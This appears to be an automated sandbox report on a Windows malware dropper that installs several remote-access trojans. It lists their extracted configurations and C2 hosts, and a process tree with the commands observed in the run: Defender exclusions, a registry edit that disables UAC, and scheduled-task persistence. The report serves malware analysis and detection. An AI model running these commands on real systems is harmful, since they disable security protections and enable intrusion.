Analysis
-
max time kernel
206s -
max time network
229s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
30-11-2022 17:43
General
-
Target
deda52b25f9255b01eb0bb22444f6b8681e4a091da20c8c7d00efde1974c8025.exe
-
Size
1.8MB
-
MD5
f1fa7d91c9d5c31b8dcb25fa73a1fad3
-
SHA1
a60fef98fb8dd848fbf57374fd2f70569950fd06
-
SHA256
deda52b25f9255b01eb0bb22444f6b8681e4a091da20c8c7d00efde1974c8025
-
SHA512
3cd56c54248b9363424bf447fd5c92bcfc6970d6ba6bf78e92abaf246c4631a8f77a7d69f9d3bd6af99d0ccbfa6490bff556d9973a10bca0ca090c40f1dc6703
-
SSDEEP
24576:3LKvy63ol0CibUBc6S4RBv6JhDW+baR5n9dV83mNO+b5j5ZmDQG5+a:3Ll63C0h6dXvSdaR93V83eljG
Malware Config
Extracted
nanocore
1.2.2.0
dontreachme3.ddns.net:3603
dontreachme1.ddns.net:3603
19a5c2b0-5593-40da-9945-6c6b53e85d75
-
activate_away_mode
false
-
backup_connection_host
dontreachme1.ddns.net
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2020-11-15T15:45:18.745530536Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
false
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
3603
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
19a5c2b0-5593-40da-9945-6c6b53e85d75
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
dontreachme3.ddns.net
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
false
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
njrat
0.7.3
Client
dontreachme3.ddns.net:3604
EdgeBrowser.exe
-
reg_key
EdgeBrowser.exe
-
splitter
123
Extracted
blacknet
v3.7.0 Public
Bot
https://furyx.de/panel
BN[e5decf896675e5ecc7bbef8ebff8a786]
-
antivm
false
-
elevate_uac
false
-
install_name
WindowsUpdate.exe
-
splitter
|BN|
-
start_name
50651597687556f33b7fc75d90350b99
-
startup
false
-
usb_spread
true
Extracted
remcos
1.7 Pro
Host
dontreachme3.ddns.net:3605
dontreachme1.ddns.net:3605
-
audio_folder
audio
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
5
-
copy_file
explorer.exe
-
copy_folder
explorer
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
true
-
install_flag
true
-
install_path
%SystemDrive%
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
RuntimeBroker
-
keylog_path
%AppData%
-
mouse_option
true
-
mutex
remcos_ekuntpjjaa
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screens
-
screenshot_path
%AppData%
-
screenshot_time
1
-
startup_value
RuntimeBroker
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
asyncrat
0.5.7B
Default
dontreachme3.ddns.net:3601
dontreachme1.ddns.net:3601
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
EpicGames.exe
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
BlackNET
BlackNET is an open source remote access tool written in VB.NET.
-
BlackNET payload 1 IoCs
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Modifies WinLogon for persistence 2 TTPs 8 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
UAC bypass 3 TTPs 2 IoCs
-
Windows security bypass 2 TTPs 11 IoCs
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Async RAT payload 1 IoCs
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 21 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 10 IoCs
-
Windows security modification 2 TTPs 19 IoCs
-
Adds Run key to start application 2 TTPs 17 IoCs
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies WinLogon 2 TTPs 1 IoCs
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 6 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 37 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\deda52b25f9255b01eb0bb22444f6b8681e4a091da20c8c7d00efde1974c8025.exe"C:\Users\Admin\AppData\Local\Temp\deda52b25f9255b01eb0bb22444f6b8681e4a091da20c8c7d00efde1974c8025.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmpA6B0.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpA6B0.tmp.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\WD+UAC.exe"C:\Users\Admin\Documents\WD+UAC.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 9204⤵
- Program crash
-
C:\Users\Admin\Documents\MicrosoftCompatibility Download.exe"C:\Users\Admin\Documents\MicrosoftCompatibility Download.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 16444⤵
- Program crash
-
C:\Users\Admin\Documents\EasyAASM.exe"C:\Users\Admin\Documents\EasyAASM.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\reagentc.exereagentc.exe /disable4⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension exe4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\realtekaudio.exe"C:\Users\Admin\AppData\Roaming\realtekaudio.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\realtekaudio.exe" -Force5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\realtekaudio.exe" -Force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\realtekaudio.exe" -Force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\realtekaudio.exe" -Force5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 15⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 16⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\realtekaudio.exe"C:\Users\Admin\AppData\Roaming\realtekaudio.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 23605⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\realtekaudio.exeC:\Users\Admin\AppData\Roaming\realtekaudio.exe4⤵
- Modifies WinLogon for persistence
- Windows security bypass
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\realtekaudio.exe" -Force5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\realtekaudio.exe" -Force5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\realtekaudio.exe" -Force5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\realtekaudio.exe" -Force5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 15⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 16⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\realtekaudio.exe"C:\Users\Admin\AppData\Roaming\realtekaudio.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 22405⤵
- Program crash
-
C:\Users\Admin\Documents\Firefoxinstaller.exe"C:\Users\Admin\Documents\Firefoxinstaller.exe"3⤵
- Modifies WinLogon for persistence
- Windows security bypass
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Firefoxinstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Firefoxinstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Firefoxinstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\Firefoxinstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\Firefoxinstaller.exe"C:\Users\Admin\Documents\Firefoxinstaller.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Firefoxinstaller.exe"C:\Users\Admin\Documents\Firefoxinstaller.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\NortonInstaller.exe"C:\Users\Admin\Documents\NortonInstaller.exe"3⤵
- Modifies WinLogon for persistence
- Windows security bypass
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NortonInstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NortonInstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NortonInstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\NortonInstaller.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\NortonInstaller.exe"C:\Users\Admin\Documents\NortonInstaller.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "UPNP Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp3687.tmp"5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 23564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 23564⤵
- Program crash
-
C:\Users\Admin\Documents\WinExplorer.exe"C:\Users\Admin\Documents\WinExplorer.exe"3⤵
- Modifies WinLogon for persistence
- Windows security bypass
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinExplorer.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinExplorer.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinExplorer.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\WinExplorer.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\WinExplorer.exe"C:\Users\Admin\Documents\WinExplorer.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\WindowsExplorer.exe"C:\Users\Admin\Documents\WindowsExplorer.exe"5⤵
- Modifies WinLogon for persistence
- Adds policy Run key to start application
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies WinLogon
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "6⤵
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 27⤵
- Runs ping.exe
-
C:\explorer\explorer.exe"C:\explorer\explorer.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 23884⤵
- Program crash
-
C:\Users\Admin\Documents\EdgeBrowser.exe"C:\Users\Admin\Documents\EdgeBrowser.exe"3⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- Windows security bypass
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeBrowser.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeBrowser.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeBrowser.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\EdgeBrowser.exe" -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\EdgeBrowser.exe"C:\Users\Admin\Documents\EdgeBrowser.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn NYAN /F5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NYAN /tr "C:\Users\Admin\Documents\EdgeBrowser.exe" /sc minute /mo 15⤵
- Creates scheduled task(s)
-
C:\Users\Admin\EdgeBrowser.exe"C:\Users\Admin\EdgeBrowser.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmpA75D.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpA75D.tmp.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3608 -ip 36081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4468 -ip 44681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1996 -ip 19961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1544 -ip 15441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6888 -ip 68881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6860 -ip 68601⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EdgeBrowser.exe.logFilesize
1KB
MD5d5e53cc8e471a9b7fbf2a280306260a7
SHA15ec93ec6c83e0992bd92549c53e6d8a81c49eeb0
SHA2567b545eafedcb5dc2e9f12ec051d88c3f2995ab3864d03c56dd0ed1aeb59ff6dc
SHA512c94792bc4af6e193bf7fb4c95e75f168046b6ca5fdf8ac08a527f078e3a2f474ece7a4ad56616550db7a2ce61985227fd28270891cb7d2f68a0737d7d4613d8b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Firefoxinstaller.exe.logFilesize
1KB
MD541088fa7e1ea7acc252be5728f4c0f56
SHA102f4aafd7025fd710491658c230ddc5493e2a366
SHA256bef0fe04c67e31e8b09cef7f80eb8b4483c939d290bac4cee7717e9cb05ccfa8
SHA5126ca956597ea1e57ac745e0183984fc0a40ee1e72a099f8303ed9564e8bc9a3ab37c43d1050a2902d34c622941a8af62bfb671ce650789e50adac35df62e60dfe
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
127B
MD580b32b79bf519fce07cdf7b8b7881067
SHA12fe368e8f5855ef5f08c46f389bf3b5482ace60b
SHA2568ed98d8b82c482aaa79a8ea2f1aaea676c5641d69f2478ba7f241e990d5d99b1
SHA512dc7b986bd5de842d8beb315dea77a424194701b6272cac884dd31cd04586879fa93f3d1f44ec9ca01625b31115b00a2b5fe5028baef7d9ab277881653cab116e
-
C:\Users\Admin\AppData\Local\Temp\tmp3687.tmpFilesize
1KB
